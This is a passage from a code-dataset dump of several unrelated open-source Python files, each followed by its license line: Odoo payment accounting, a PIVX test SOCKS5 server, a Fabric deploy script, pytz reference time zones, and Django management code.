        # Sale-type moves feed the "invoices" button; everything else feeds
        # the "bills" button.
        if res['move_type'] in self.env['account.move'].get_sale_types(True):
            pay.reconciled_invoice_ids += self.env['account.move'].browse(res.get('invoice_ids', []))
            pay.reconciled_invoices_count = len(res.get('invoice_ids', []))
        else:
            pay.reconciled_bill_ids += self.env['account.move'].browse(res.get('invoice_ids', []))
            pay.reconciled_bills_count = len(res.get('invoice_ids', []))

    # Per payment, collect the bank statements matched with it through a
    # partial on the journal's outstanding payment debit/credit account.
    self._cr.execute('''
        SELECT
            payment.id,
            ARRAY_AGG(DISTINCT counterpart_line.statement_id) AS statement_ids
        FROM account_payment payment
        JOIN account_move move ON move.id = payment.move_id
        JOIN account_journal journal ON journal.id = move.journal_id
        JOIN account_move_line line ON line.move_id = move.id
        JOIN account_account account ON account.id = line.account_id
        JOIN account_partial_reconcile part ON
            part.debit_move_id = line.id
            OR
            part.credit_move_id = line.id
        JOIN account_move_line counterpart_line ON
            part.debit_move_id = counterpart_line.id
            OR
            part.credit_move_id = counterpart_line.id
        WHERE (account.id = journal.payment_debit_account_id OR account.id = journal.payment_credit_account_id)
            AND payment.id IN %(payment_ids)s
            AND line.id != counterpart_line.id
            AND counterpart_line.statement_id IS NOT NULL
        GROUP BY payment.id
    ''', {
        'payment_ids': tuple(stored_payments.ids)
    })
    query_res = dict((payment_id, statement_ids) for payment_id, statement_ids in self._cr.fetchall())

    for pay in self:
        statement_ids = query_res.get(pay.id, [])
        pay.reconciled_statement_ids = [(6, 0, statement_ids)]
        pay.reconciled_statements_count = len(statement_ids)
# -------------------------------------------------------------------------
# ONCHANGE METHODS
# -------------------------------------------------------------------------
@api.onchange('posted_before', 'state', 'journal_id', 'date')
def _onchange_journal_date(self):
    """Reset the payment name when the journal or date changes on a new record.

    Before the record is created, the move_id doesn't exist yet, and the name
    would not be recomputed correctly if we change the journal or the date,
    leading to inconsistencies.
    """
    if not self.move_id:
        self.name = False
# -------------------------------------------------------------------------
# CONSTRAINT METHODS
# -------------------------------------------------------------------------
@api.constrains('payment_method_id')
def _check_payment_method_id(self):
    """Ensure every payment carries a payment method.

    This can't be enforced with a plain ``required=True`` because the
    field is a computed, editable, stored one.
    """
    if self.filtered(lambda payment: not payment.payment_method_id):
        raise ValidationError(_("Please define a payment method on your payment."))
# -------------------------------------------------------------------------
# LOW-LEVEL METHODS
# -------------------------------------------------------------------------
@api.model_create_multi
def create(self, vals_list):
    """Create payments together with their underlying journal entries.

    :param vals_list: List of create values for account.payment; each dict
        may carry an extra 'write_off_line_vals' key used to generate a
        custom write-off line on the journal entry.
    :return: The created account.payment recordset.
    """
    # OVERRIDE
    write_off_line_vals_list = []

    for vals in vals_list:

        # Hack to add a custom write-off line.
        write_off_line_vals_list.append(vals.pop('write_off_line_vals', None))

        # Force the move_type to avoid inconsistency with residual 'default_move_type' inside the context.
        vals['move_type'] = 'entry'

        # Force the computation of 'journal_id' since this field is set on account.move but must have the
        # bank/cash type.
        if 'journal_id' not in vals:
            vals['journal_id'] = self._get_default_journal().id

        # Since 'currency_id' is a computed editable field, it will be computed later.
        # Prevent the account.move to call the _get_default_currency method that could raise
        # the 'Please define an accounting miscellaneous journal in your company' error.
        if 'currency_id' not in vals:
            journal = self.env['account.journal'].browse(vals['journal_id'])
            vals['currency_id'] = journal.currency_id.id or journal.company_id.currency_id.id

    payments = super().create(vals_list)

    for i, pay in enumerate(payments):
        write_off_line_vals = write_off_line_vals_list[i]

        # Write payment_id on the journal entry plus the fields being stored in both models but having the same
        # name, e.g. partner_bank_id. The ORM is currently not able to perform such synchronization and make things
        # more difficult by creating related fields on the fly to handle the _inherits.
        # Then, when partner_bank_id is in vals, the key is consumed by account.payment but is never written on
        # account.move.
        to_write = {'payment_id': pay.id}
        for k, v in vals_list[i].items():
            if k in self._fields and self._fields[k].store and k in pay.move_id._fields and pay.move_id._fields[k].store:
                to_write[k] = v

        if 'line_ids' not in vals_list[i]:
            # No explicit lines given: generate the default
            # liquidity/counterpart/write-off journal items.
            to_write['line_ids'] = [(0, 0, line_vals) for line_vals in pay._prepare_move_line_default_vals(write_off_line_vals=write_off_line_vals)]

        pay.move_id.write(to_write)

    return payments
def write(self, vals):
    # OVERRIDE: after the regular write, propagate the modified fields to
    # the underlying journal entry.
    result = super().write(vals)
    self._synchronize_to_moves(set(vals))
    return result
def unlink(self):
    # OVERRIDE to also drop the inherited journal entry (move_id field).
    # Grab the moves first: once super().unlink() ran, the payments are gone.
    linked_moves = self.with_context(force_delete=True).move_id
    result = super().unlink()
    linked_moves.unlink()
    return result
@api.depends('move_id.name')
def name_get(self):
    """Display each payment under its journal entry name, or 'Draft Payment'."""
    display = []
    for payment in self:
        display.append((payment.id, payment.move_id.name or _('Draft Payment')))
    return display
# -------------------------------------------------------------------------
# SYNCHRONIZATION account.payment <-> account.move
# -------------------------------------------------------------------------
def _synchronize_from_moves(self, changed_fields):
    ''' Update the account.payment regarding its related account.move.
    Also, check both models are still consistent.
    :param changed_fields: A set containing all modified fields on account.move.
    '''
    if self._context.get('skip_account_move_synchronization'):
        return

    for pay in self.with_context(skip_account_move_synchronization=True):

        # After the migration to 14.0, the journal entry could be shared between the account.payment and the
        # account.bank.statement.line. In that case, the synchronization will only be made with the statement line.
        if pay.move_id.statement_line_id:
            continue

        move = pay.move_id
        move_vals_to_write = {}
        payment_vals_to_write = {}

        if 'journal_id' in changed_fields:
            if pay.journal_id.type not in ('bank', 'cash'):
                raise UserError(_("A payment must always belongs to a bank or cash journal."))

        if 'line_ids' in changed_fields:
            all_lines = move.line_ids
            liquidity_lines, counterpart_lines, writeoff_lines = pay._seek_for_lines()

            # Exactly one liquidity line and one counterpart line are
            # required for the journal entry to still represent a payment.
            if len(liquidity_lines) != 1 or len(counterpart_lines) != 1:
                raise UserError(_(
                    "The journal entry %s reached an invalid state relative to its payment.\n"
                    "To be consistent, the journal entry must always contains:\n"
                    "- one journal item involving the outstanding payment/receipts account.\n"
                    "- one journal item involving a receivable/payable account.\n"
                    "- optional journal items, all sharing the same account.\n\n"
                ) % move.display_name)

            if writeoff_lines and len(writeoff_lines.account_id) != 1:
                raise UserError(_(
                    "The journal entry %s reached an invalid state relative to its payment.\n"
                    "To be consistent, all the write-off journal items must share the same account."
                ) % move.display_name)

            if any(line.currency_id != all_lines[0].currency_id for line in all_lines):
                raise UserError(_(
                    "The journal entry %s reached an invalid state relative to its payment.\n"
                    "To be consistent, the journal items must share the same currency."
                ) % move.display_name)

            if any(line.partner_id != all_lines[0].partner_id for line in all_lines):
                raise UserError(_(
                    "The journal entry %s reached an invalid state relative to its payment.\n"
                    "To be consistent, the journal items must share the same partner."
                ) % move.display_name)

            # The partner type follows the counterpart account's internal type.
            if counterpart_lines.account_id.user_type_id.type == 'receivable':
                partner_type = 'customer'
            else:
                partner_type = 'supplier'

            liquidity_amount = liquidity_lines.amount_currency

            move_vals_to_write.update({
                'currency_id': liquidity_lines.currency_id.id,
                'partner_id': liquidity_lines.partner_id.id,
            })
            # The sign of the liquidity amount determines the payment direction.
            payment_vals_to_write.update({
                'amount': abs(liquidity_amount),
                'payment_type': 'inbound' if liquidity_amount > 0.0 else 'outbound',
                'partner_type': partner_type,
                'currency_id': liquidity_lines.currency_id.id,
                'destination_account_id': counterpart_lines.account_id.id,
                'partner_id': liquidity_lines.partner_id.id,
            })

        move.write(move._cleanup_write_orm_values(move, move_vals_to_write))
        pay.write(move._cleanup_write_orm_values(pay, payment_vals_to_write))
def _synchronize_to_moves(self, changed_fields):
    ''' Update the account.move regarding the modified account.payment.
    :param changed_fields: A list containing all modified fields on account.payment.
    '''
    if self._context.get('skip_account_move_synchronization'):
        return

    # Nothing to do when none of the synchronized fields changed.
    if not any(field_name in changed_fields for field_name in (
        'date', 'amount', 'payment_type', 'partner_type', 'payment_reference', 'is_internal_transfer',
        'currency_id', 'partner_id', 'destination_account_id', 'partner_bank_id',
    )):
        return

    for pay in self.with_context(skip_account_move_synchronization=True):
        liquidity_lines, counterpart_lines, writeoff_lines = pay._seek_for_lines()

        # Make sure to preserve the write-off amount.
        # This allows to create a new payment with custom 'line_ids'.
        if writeoff_lines:
            writeoff_amount = sum(writeoff_lines.mapped('amount_currency'))
            counterpart_amount = counterpart_lines['amount_currency']
            if writeoff_amount > 0.0 and counterpart_amount > 0.0:
                sign = 1
            else:
                sign = -1

            write_off_line_vals = {
                'name': writeoff_lines[0].name,
                'amount': writeoff_amount * sign,
                'account_id': writeoff_lines[0].account_id.id,
            }
        else:
            write_off_line_vals = {}

        line_vals_list = pay._prepare_move_line_default_vals(write_off_line_vals=write_off_line_vals)

        # (1, id, vals) commands update the existing liquidity/counterpart
        # journal items in place.
        line_ids_commands = [
            (1, liquidity_lines.id, line_vals_list[0]),
            (1, counterpart_lines.id, line_vals_list[1]),
        ]

        # Drop all previous write-off lines...
        for line in writeoff_lines:
            line_ids_commands.append((2, line.id))

        # ...and recreate a single aggregated write-off line if needed.
        if writeoff_lines:
            line_ids_commands.append((0, 0, line_vals_list[2]))

        # Update the existing journal items.
        # If dealing with multiple write-off lines, they are dropped and a new one is generated.
        pay.move_id.write({
            'partner_id': pay.partner_id.id,
            'currency_id': pay.currency_id.id,
            'partner_bank_id': pay.partner_bank_id.id,
            'line_ids': line_ids_commands,
        })
# -------------------------------------------------------------------------
# BUSINESS METHODS
# -------------------------------------------------------------------------
def mark_as_sent(self):
    """Flag the payments as sent to the customer/vendor."""
    self.write({'is_move_sent': True})

def unmark_as_sent(self):
    """Remove the 'sent' flag from the payments."""
    self.write({'is_move_sent': False})

def action_post(self):
    ''' draft -> posted '''
    self.move_id._post(soft=False)

def action_cancel(self):
    ''' draft -> cancelled '''
    self.move_id.button_cancel()

def action_draft(self):
    ''' posted -> draft '''
    self.move_id.button_draft()
def button_open_invoices(self):
    """Open the invoice(s) paid by this payment.

    :return: An act_window action on account.move (form view when a single
        invoice is reconciled, list view otherwise).
    """
    self.ensure_one()

    invoices = self.reconciled_invoice_ids
    action = {
        'name': _("Paid Invoices"),
        'type': 'ir.actions.act_window',
        'res_model': 'account.move',
        'context': {'create': False},
    }
    if len(invoices) == 1:
        action['view_mode'] = 'form'
        action['res_id'] = invoices.id
    else:
        action['view_mode'] = 'list,form'
        action['domain'] = [('id', 'in', invoices.ids)]
    return action
def button_open_bills(self):
    """Open the vendor bill(s) paid by this payment.

    :return: An act_window action on account.move (form view when a single
        bill is reconciled, list view otherwise).
    """
    self.ensure_one()

    bills = self.reconciled_bill_ids
    action = {
        'name': _("Paid Bills"),
        'type': 'ir.actions.act_window',
        'res_model': 'account.move',
        'context': {'create': False},
    }
    if len(bills) == 1:
        action['view_mode'] = 'form'
        action['res_id'] = bills.id
    else:
        action['view_mode'] = 'list,form'
        action['domain'] = [('id', 'in', bills.ids)]
    return action
def button_open_statements(self):
    """Open the bank statement(s) reconciled with this payment.

    :return: An act_window action on account.bank.statement (form view when
        a single statement is matched, list view otherwise).
    """
    self.ensure_one()

    statements = self.reconciled_statement_ids
    action = {
        'name': _("Matched Statements"),
        'type': 'ir.actions.act_window',
        'res_model': 'account.bank.statement',
        'context': {'create': False},
    }
    if len(statements) == 1:
        action['view_mode'] = 'form'
        action['res_id'] = statements.id
    else:
        action['view_mode'] = 'list,form'
        action['domain'] = [('id', 'in', statements.ids)]
    return action
| agpl-3.0 |
PIVX-Project/PIVX | test/functional/test_framework/socks5.py | 9 | 5684 | #!/usr/bin/env python3
# Copyright (c) 2015-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Dummy Socks5 server for testing."""
import socket, threading, queue
import logging
logger = logging.getLogger("TestFramework.socks5")
### Protocol constants
class Command:
    """SOCKS5 command codes (RFC 1928, section 4)."""
    CONNECT = 0x01
class AddressType:
    """SOCKS5 address-type codes (RFC 1928, section 5)."""
    IPV4 = 0x01
    DOMAINNAME = 0x03
    IPV6 = 0x04
### Utility functions
def recvall(s, n):
    """Receive exactly *n* bytes from socket *s*, or raise IOError on EOF."""
    buf = bytearray()
    remaining = n
    while remaining > 0:
        chunk = s.recv(remaining)
        if not chunk:
            # The peer closed the connection before n bytes arrived.
            raise IOError('Unexpected end of stream')
        buf.extend(chunk)
        remaining -= len(chunk)
    return buf
### Implementation classes
class Socks5Configuration():
    """Configuration holder for a Socks5Server instance."""
    def __init__(self):
        # Bind address as a (host, port) tuple; must be set by the caller.
        self.addr = None
        # Address family used for the listening socket.
        self.af = socket.AF_INET
        # Whether unauthenticated connections are accepted.
        self.unauth = False
        # Whether username/password authentication is accepted.
        self.auth = False
class Socks5Command():
    """Parsed representation of one incoming SOCKS5 command."""
    def __init__(self, cmd, atyp, addr, port, username, password):
        self.cmd = cmd            # Command code (one of Command.*)
        self.atyp = atyp          # Address type (one of AddressType.*)
        self.addr = addr          # Target address
        self.port = port          # Target port
        self.username = username  # Optional authentication user name
        self.password = password  # Optional authentication password
    def __repr__(self):
        fields = (self.cmd, self.atyp, self.addr, self.port, self.username, self.password)
        return 'Socks5Command(%s,%s,%s,%s,%s,%s)' % fields
class Socks5Connection():
    """Handles a single client connection accepted by Socks5Server."""
    def __init__(self, serv, conn, peer):
        self.serv = serv  # owning Socks5Server (configuration + result queue)
        self.conn = conn  # connected socket to the client
        self.peer = peer  # client address
    def handle(self):
        """Handle socks5 request according to RFC 1928.

        On success a Socks5Command is put on the server queue; on failure
        the exception is put there instead. The connection is always closed.
        """
        try:
            # Verify socks version
            ver = recvall(self.conn, 1)[0]
            if ver != 0x05:
                raise IOError('Invalid socks version %i' % ver)
            # Choose authentication method
            nmethods = recvall(self.conn, 1)[0]
            methods = bytearray(recvall(self.conn, nmethods))
            method = None
            if 0x02 in methods and self.serv.conf.auth:
                method = 0x02 # username/password
            elif 0x00 in methods and self.serv.conf.unauth:
                method = 0x00 # unauthenticated
            if method is None:
                raise IOError('No supported authentication method was offered')
            # Send response
            self.conn.sendall(bytearray([0x05, method]))
            # Read authentication (optional)
            username = None
            password = None
            if method == 0x02:
                ver = recvall(self.conn, 1)[0]
                if ver != 0x01:
                    raise IOError('Invalid auth packet version %i' % ver)
                ulen = recvall(self.conn, 1)[0]
                username = str(recvall(self.conn, ulen))
                plen = recvall(self.conn, 1)[0]
                password = str(recvall(self.conn, plen))
                # Send authentication response
                self.conn.sendall(bytearray([0x01, 0x00]))
            # Read connect request
            ver, cmd, _, atyp = recvall(self.conn, 4)
            if ver != 0x05:
                raise IOError('Invalid socks version %i in connect request' % ver)
            if cmd != Command.CONNECT:
                raise IOError('Unhandled command %i in connect request' % cmd)
            # Read the destination address; the wire format depends on atyp.
            if atyp == AddressType.IPV4:
                addr = recvall(self.conn, 4)
            elif atyp == AddressType.DOMAINNAME:
                n = recvall(self.conn, 1)[0]
                addr = recvall(self.conn, n)
            elif atyp == AddressType.IPV6:
                addr = recvall(self.conn, 16)
            else:
                raise IOError('Unknown address type %i' % atyp)
            # Port arrives big-endian as two bytes.
            port_hi,port_lo = recvall(self.conn, 2)
            port = (port_hi << 8) | port_lo
            # Send dummy response
            self.conn.sendall(bytearray([0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]))
            cmdin = Socks5Command(cmd, atyp, addr, port, username, password)
            # Report the parsed command to the test through the server queue.
            self.serv.queue.put(cmdin)
            logger.info('Proxy: %s', cmdin)
            # Fall through to disconnect
        except Exception as e:
            logger.exception("socks5 request handling failed.")
            self.serv.queue.put(e)
        finally:
            self.conn.close()
class Socks5Server():
    """Minimal threaded SOCKS5 server for tests.

    Accepted commands (and handler exceptions) are reported on self.queue.
    """
    def __init__(self, conf):
        self.conf = conf
        self.s = socket.socket(conf.af)
        self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.s.bind(conf.addr)
        self.s.listen(5)
        self.running = False
        self.thread = None
        self.queue = queue.Queue() # report connections and exceptions to client
    def run(self):
        """Accept loop: spawn one daemon thread per incoming connection."""
        while self.running:
            (sockconn, peer) = self.s.accept()
            # running may have been cleared by stop() while we were blocked
            # in accept(); in that case drop the wake-up connection.
            if self.running:
                conn = Socks5Connection(self, sockconn, peer)
                thread = threading.Thread(None, conn.handle)
                thread.daemon = True
                thread.start()
    def start(self):
        """Start the accept loop in a background daemon thread."""
        assert(not self.running)
        self.running = True
        self.thread = threading.Thread(None, self.run)
        self.thread.daemon = True
        self.thread.start()
    def stop(self):
        """Stop the accept loop and wait for the server thread to exit."""
        self.running = False
        # connect to self to end run loop
        s = socket.socket(self.conf.af)
        s.connect(self.conf.addr)
        s.close()
        self.thread.join()
| mit |
scorphus/gandalf | fabfile.py | 7 | 1221 | # -*- coding: utf-8 -*-
# Copyright 2012 gandalf authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import os
from fabric.api import abort, cd, env, local, put, run
current_dir = os.path.abspath(os.path.dirname(__file__))
env.user = 'git'
env.gandalf_path = '/home/%s/gandalf' % env.user
def build():
    """Compile the gandalf binaries into dist/.

    Aborts unless the build host is linux_amd64, since the produced
    binaries are deployed to a Linux server.
    """
    goos = local("go env GOOS", capture=True)
    goarch = local("go env GOARCH", capture=True)
    if goos != "linux" or goarch != "amd64":
        abort("gandalf must be built on linux_amd64 for deployment, you're on %s_%s" % (goos, goarch))
    local("mkdir -p dist")
    local("go clean ./...")
    # -a forces rebuilding of packages that are already up to date.
    local("go build -a -o dist/gandalf-webserver ./webserver")
    local("go build -a -o dist/gandalf ./bin")

def clean():
    """Remove local build artifacts (dist/ and the tarball)."""
    local("rm -rf dist")
    local("rm -f dist.tar.gz")

def send():
    """Pack dist/ into a tarball and upload it to the remote gandalf directory."""
    local("tar -czf dist.tar.gz dist")
    run("mkdir -p %(gandalf_path)s" % env)
    put(os.path.join(current_dir, "dist.tar.gz"), env.gandalf_path)

def restart():
    """Unpack the uploaded tarball on the server and restart the web service."""
    with cd(env.gandalf_path):
        run("tar -xzf dist.tar.gz")
        run("circusctl restart gandalf-web")

def deploy():
    """Full deployment: build, upload, restart, then clean up locally."""
    build()
    send()
    restart()
    clean()
| bsd-3-clause |
JaneliaSciComp/Neuroptikon | Source/library/ontology_term.py | 1 | 2276 | # Copyright (c) 2010 Howard Hughes Medical Institute.
# All rights reserved.
# Use is subject to Janelia Farm Research Campus Software Copyright 1.1 license terms.
# http://license.janelia.org/license/jfrc_copyright_1_1.html
class OntologyTerm(object):
    """A single term of an ontology, optionally populated from an OBO stanza."""

    def __init__(self, ontology, oboStanza = None, *args, **keywordArgs):
        object.__init__(self, *args, **keywordArgs)
        self.ontology = ontology
        self.oboStanza = oboStanza
        self.identifier = None
        self.name = None
        self.abbreviation = None
        self.partOf = None       # parent term, or its id string if not loaded yet
        self.parts = []          # child terms
        self.obsolete = False
        if self.oboStanza is not None:
            self._populateFromStanza()

    def _populateFromStanza(self):
        # Mirror the OBO stanza's tags onto this term's attributes.
        tags = self.oboStanza.tags
        self.identifier = tags['id'][0].value
        self.name = tags['name'][0].value

        # If this term has a 'part-of' relationship then try to set the parent term.
        if 'relationship' in tags:
            relationship = tags['relationship'][0]
            if relationship.value.startswith('part_of '):
                parentId = relationship.value[8:]
                if parentId in self.ontology:
                    parentTerm = self.ontology[parentId]
                    self.partOf = parentTerm
                    parentTerm.parts.append(self)
                else:
                    # The parent of this term has not been loaded yet.
                    # Keep its ID so it can be resolved later.
                    self.partOf = parentId

        # Grab any abbreviation.
        if 'synonym' in tags:
            synonym = tags['synonym'][0]
            for modifier in synonym.modifiers or ():
                if 'ABBREVIATION' in modifier:
                    self.abbreviation = synonym.value
                    break
        # TODO: grab other synonyms?

        if 'def' in tags:
            if tags['def'][0].value == 'obsolete':
                self.obsolete = True

    def browse(self):
        """Open the ontology browser and select this term."""
        # Make sure the ontology is open
        self.ontology.browse()
        self.ontology.frame.selectTerm(self)
| bsd-3-clause |
subutai/nupic | external/linux32/lib/python2.6/site-packages/pytz/reference.py | 839 | 3649 | '''
Reference tzinfo implementations from the Python docs.
Used for testing against as they are only correct for the years
1987 to 2006. Do not use these for real code.
'''
from datetime import tzinfo, timedelta, datetime
from pytz import utc, UTC, HOUR, ZERO
# A class building tzinfo objects for fixed-offset time zones.
# Note that FixedOffset(0, "UTC") is a different way to build a
# UTC tzinfo object.
class FixedOffset(tzinfo):
    """Fixed offset in minutes east from UTC."""

    def __init__(self, offset, name):
        self._offset = timedelta(minutes=offset)
        self._name = name

    def utcoffset(self, dt):
        # The offset never varies with the datetime.
        return self._offset

    def dst(self, dt):
        # A fixed-offset zone never observes daylight saving time.
        return ZERO

    def tzname(self, dt):
        return self._name
# A class capturing the platform's idea of local time.
import time as _time

# Offsets derived from the C library's global timezone data.
STDOFFSET = timedelta(seconds = -_time.timezone)
if _time.daylight:
    DSTOFFSET = timedelta(seconds = -_time.altzone)
else:
    DSTOFFSET = STDOFFSET

# Extra offset applied while DST is in effect.
DSTDIFF = DSTOFFSET - STDOFFSET

class LocalTimezone(tzinfo):
    """tzinfo describing the platform's local time rules (via time.mktime)."""

    def utcoffset(self, dt):
        if self._isdst(dt):
            return DSTOFFSET
        else:
            return STDOFFSET

    def dst(self, dt):
        if self._isdst(dt):
            return DSTDIFF
        else:
            return ZERO

    def tzname(self, dt):
        return _time.tzname[self._isdst(dt)]

    def _isdst(self, dt):
        # Round-trip through mktime/localtime so the C library decides
        # whether DST applies to this naive local timestamp.
        tt = (dt.year, dt.month, dt.day,
              dt.hour, dt.minute, dt.second,
              dt.weekday(), 0, -1)
        stamp = _time.mktime(tt)
        tt = _time.localtime(stamp)
        return tt.tm_isdst > 0

Local = LocalTimezone()
# A complete implementation of current DST rules for major US time zones.
def first_sunday_on_or_after(dt):
    """Return the first Sunday on or after *dt*, keeping the time of day."""
    days_ahead = 6 - dt.weekday()  # Monday is 0, Sunday is 6.
    return dt + timedelta(days=days_ahead) if days_ahead else dt
# In the US, DST starts at 2am (standard time) on the first Sunday in April.
DSTSTART = datetime(1, 4, 1, 2)
# and ends at 2am (DST time; 1am standard time) on the last Sunday of Oct.
# which is the first Sunday on or after Oct 25.
DSTEND = datetime(1, 10, 25, 1)

class USTimeZone(tzinfo):
    """US time zone applying the 1987-2006 DST rules (see module docstring)."""

    def __init__(self, hours, reprname, stdname, dstname):
        self.stdoffset = timedelta(hours=hours)  # standard offset from UTC
        self.reprname = reprname                 # e.g. 'Eastern'
        self.stdname = stdname                   # standard-time abbreviation, e.g. 'EST'
        self.dstname = dstname                   # DST abbreviation, e.g. 'EDT'

    def __repr__(self):
        return self.reprname

    def tzname(self, dt):
        if self.dst(dt):
            return self.dstname
        else:
            return self.stdname

    def utcoffset(self, dt):
        return self.stdoffset + self.dst(dt)

    def dst(self, dt):
        if dt is None or dt.tzinfo is None:
            # An exception may be sensible here, in one or both cases.
            # It depends on how you want to treat them. The default
            # fromutc() implementation (called by the default astimezone()
            # implementation) passes a datetime with dt.tzinfo is self.
            return ZERO
        assert dt.tzinfo is self

        # Find first Sunday in April & the last in October.
        start = first_sunday_on_or_after(DSTSTART.replace(year=dt.year))
        end = first_sunday_on_or_after(DSTEND.replace(year=dt.year))

        # Can't compare naive to aware objects, so strip the timezone from
        # dt first.
        if start <= dt.replace(tzinfo=None) < end:
            return HOUR
        else:
            return ZERO

Eastern = USTimeZone(-5, "Eastern", "EST", "EDT")
Central = USTimeZone(-6, "Central", "CST", "CDT")
Mountain = USTimeZone(-7, "Mountain", "MST", "MDT")
Pacific = USTimeZone(-8, "Pacific", "PST", "PDT")
| agpl-3.0 |
izonder/intellij-community | python/lib/Lib/site-packages/django/contrib/auth/management/__init__.py | 126 | 2854 | """
Creates permissions for all installed apps that need permissions.
"""
from django.contrib.auth import models as auth_app
from django.db.models import get_models, signals
def _get_permission_codename(action, opts):
return u'%s_%s' % (action, opts.object_name.lower())
def _get_all_permissions(opts):
"Returns (codename, name) for all permissions in the given opts."
perms = []
for action in ('add', 'change', 'delete'):
perms.append((_get_permission_codename(action, opts), u'Can %s %s' % (action, opts.verbose_name_raw)))
return perms + list(opts.permissions)
def create_permissions(app, created_models, verbosity, **kwargs):
    """post_syncdb handler: create any missing default (add/change/delete)
    and custom permissions for every model of the given app."""
    from django.contrib.contenttypes.models import ContentType

    app_models = get_models(app)

    # This will hold the permissions we're looking for as
    # (content_type, (codename, name))
    searched_perms = list()
    # The codenames and ctypes that should exist.
    ctypes = set()
    for klass in app_models:
        ctype = ContentType.objects.get_for_model(klass)
        ctypes.add(ctype)
        for perm in _get_all_permissions(klass._meta):
            searched_perms.append((ctype, perm))

    # Find all the Permissions that have a context_type for a model we're
    # looking for. We don't need to check for codenames since we already have
    # a list of the ones we're going to create.
    all_perms = set(auth_app.Permission.objects.filter(
        content_type__in=ctypes,
    ).values_list(
        "content_type", "codename"
    ))

    for ctype, (codename, name) in searched_perms:
        # If the permissions exists, move on.
        if (ctype.pk, codename) in all_perms:
            continue
        p = auth_app.Permission.objects.create(
            codename=codename,
            name=name,
            content_type=ctype
        )
        if verbosity >= 2:
            print "Adding permission '%s'" % p
def create_superuser(app, created_models, verbosity, **kwargs):
    """post_syncdb handler: interactively offer to create a superuser the
    first time the auth app's User table is installed."""
    from django.core.management import call_command

    if auth_app.User in created_models and kwargs.get('interactive', True):
        msg = ("\nYou just installed Django's auth system, which means you "
            "don't have any superusers defined.\nWould you like to create one "
            "now? (yes/no): ")
        confirm = raw_input(msg)
        while 1:
            # Re-prompt until the answer is exactly "yes" or "no".
            if confirm not in ('yes', 'no'):
                confirm = raw_input('Please enter either "yes" or "no": ')
                continue
            if confirm == 'yes':
                call_command("createsuperuser", interactive=True)
            break
# Wire the handlers into syncdb: permissions are (re)created after every
# app's tables sync, and the superuser prompt fires only for the auth app.
signals.post_syncdb.connect(create_permissions,
    dispatch_uid = "django.contrib.auth.management.create_permissions")
signals.post_syncdb.connect(create_superuser,
    sender=auth_app, dispatch_uid = "django.contrib.auth.management.create_superuser")
| apache-2.0 |
blighj/django | django/core/management/__init__.py | 20 | 14603 | import functools
import os
import pkgutil
import sys
from collections import OrderedDict, defaultdict
from importlib import import_module
import django
from django.apps import apps
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.base import (
BaseCommand, CommandError, CommandParser, handle_default_options,
)
from django.core.management.color import color_style
from django.utils import autoreload
from django.utils.encoding import force_text
def find_commands(management_dir):
    """Return the names of all command modules available under the
    'commands' package of the given management directory."""
    command_dir = os.path.join(management_dir, 'commands')
    names = []
    for _finder, name, is_pkg in pkgutil.iter_modules([command_dir]):
        # Sub-packages and private modules (leading underscore) are not commands.
        if not is_pkg and not name.startswith('_'):
            names.append(name)
    return names
def load_command_class(app_name, name):
    """Instantiate the Command class for *name* inside *app_name*.

    Errors raised by the import (ImportError, AttributeError) are allowed
    to propagate to the caller.
    """
    command_module = import_module('%s.management.commands.%s' % (app_name, name))
    return command_module.Command()
@functools.lru_cache(maxsize=None)
def get_commands():
    """
    Return a dictionary mapping command names to their callback applications.

    Look for a management.commands package in django.core, and in each
    installed application -- if a commands package exists, register all
    commands in that package.

    Core commands are always included. If a settings module has been
    specified, also include user-defined commands.

    The dictionary is in the format {command_name: app_name}. Key-value
    pairs from this dictionary can then be used in calls to
    load_command_class(app_name, command_name)

    If a specific version of a command must be loaded (e.g., with the
    startapp command), the instantiated module can be placed in the
    dictionary in place of the application name.

    The dictionary is cached on the first call and reused on subsequent
    calls.
    """
    # __path__[0] is this package's directory: django.core's own commands.
    commands = {name: 'django.core' for name in find_commands(__path__[0])}

    if not settings.configured:
        # Without settings there are no installed apps to scan.
        return commands

    # Iterate in reverse so that commands from earlier apps in
    # INSTALLED_APPS override those from later ones.
    for app_config in reversed(list(apps.get_app_configs())):
        path = os.path.join(app_config.path, 'management')
        commands.update({name: app_config.name for name in find_commands(path)})

    return commands
def call_command(command_name, *args, **options):
    """
    Call the given command, with the given options and args/kwargs.

    This is the primary API you should use for calling specific commands.

    `name` may be a string or a command object. Using a string is preferred
    unless the command object is required for further processing or testing.

    Some examples:
        call_command('migrate')
        call_command('shell', plain=True)
        call_command('sqlmigrate', 'myapp')

        from django.core.management.commands import flush
        cmd = flush.Command()
        call_command(cmd, verbosity=0, interactive=False)
        # Do something with cmd ...
    """
    if isinstance(command_name, BaseCommand):
        # Command object passed in.
        command = command_name
        command_name = command.__class__.__module__.split('.')[-1]
    else:
        # Load the command object by name.
        try:
            app_name = get_commands()[command_name]
        except KeyError:
            raise CommandError("Unknown command: %r" % command_name)

        if isinstance(app_name, BaseCommand):
            # If the command is already loaded, use it directly.
            command = app_name
        else:
            command = load_command_class(app_name, command_name)

    # Simulate argument parsing to get the option defaults (see #10080 for details).
    parser = command.create_parser('', command_name)
    # Use the `dest` option name from the parser option
    opt_mapping = {
        min(s_opt.option_strings).lstrip('-').replace('-', '_'): s_opt.dest
        for s_opt in parser._actions if s_opt.option_strings
    }
    arg_options = {opt_mapping.get(key, key): value for key, value in options.items()}
    defaults = parser.parse_args(args=[force_text(a) for a in args])
    defaults = dict(defaults._get_kwargs(), **arg_options)
    # Move positional args out of options to mimic legacy optparse
    args = defaults.pop('args', ())
    # System checks are skipped by default when invoked programmatically,
    # unless the caller explicitly asked for them.
    if 'skip_checks' not in options:
        defaults['skip_checks'] = True

    return command.execute(*args, **defaults)
class ManagementUtility:
    """
    Encapsulate the logic of the django-admin and manage.py utilities.
    """
    def __init__(self, argv=None):
        # Copy sys.argv so later mutation of self.argv can't affect it.
        self.argv = argv or sys.argv[:]
        # Program name shown in usage/error messages (e.g. 'manage.py').
        self.prog_name = os.path.basename(self.argv[0])
        # Holds the settings import error, if any, for later reporting.
        self.settings_exception = None
def main_help_text(self, commands_only=False):
    """Return the script's main help text, as a string.

